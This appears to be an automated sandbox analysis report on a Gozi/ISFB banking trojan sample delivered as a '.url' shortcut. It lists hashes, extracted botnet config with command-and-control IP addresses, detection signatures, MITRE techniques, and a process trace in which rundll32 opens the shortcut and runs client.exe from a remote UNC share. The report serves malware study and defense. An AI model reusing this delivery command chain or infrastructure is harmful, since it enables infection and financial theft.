gozi | 8591ffc132683cf4b3ae634ca29847788d15bbced677e02770b4cdb2e6e4192b

Analysis

max time kernel
143s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
03-10-2023 11:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

impresa.url
Size

192B
MD5

52aa02b4f67f2f504fcb991e6d094e58
SHA1

87e772a1597eba6b20bb750fd79c9ac30738229a
SHA256

8bb04ebea49b92e090b777efedfa44c8aa881a5531a0791f7f2404d0d50f9963
SHA512

e5baa8bbce30f1ca6c64705b9145454857c02f2a27308fc27b07c145517cbd3ccbde2cb57f94459df9fe4311a82cb3607f097a6219286f1d9eca44b953d54be4

Score

10^/10

gozi 5050 banker dave isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

46.8.210.250

31.41.44.9

185.247.184.139

62.72.33.155

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Dave packer 1 IoCs

Detects executable using a packer named 'Dave' by the community, based on a string at the end.

dave

Processes:

resource	yara_rule
behavioral2/memory/1616-1-0x0000000000CC0000-0x0000000000CCC000-memory.dmp	dave

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

rundll32.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\Control Panel\International\Geo\Nation	rundll32.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

rundll32.exe

description	pid	process	target process
PID 2212 wrote to memory of 1616	2212	rundll32.exe	client.exe
PID 2212 wrote to memory of 1616	2212	rundll32.exe	client.exe
PID 2212 wrote to memory of 1616	2212	rundll32.exe	client.exe

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\impresa.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2212

\??\UNC\62.173.146.42\scarica\client.exe
"\\62.173.146.42\scarica\client.exe"
2⤵
PID:1616

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1616-1-0x0000000000CC0000-0x0000000000CCC000-memory.dmp

Filesize
48KB

Download
memory/1616-0-0x0000000000CD0000-0x0000000000CDF000-memory.dmp

Filesize
60KB

Download
memory/1616-5-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1616-11-0x00000000028C0000-0x00000000028CD000-memory.dmp

Filesize
52KB

Download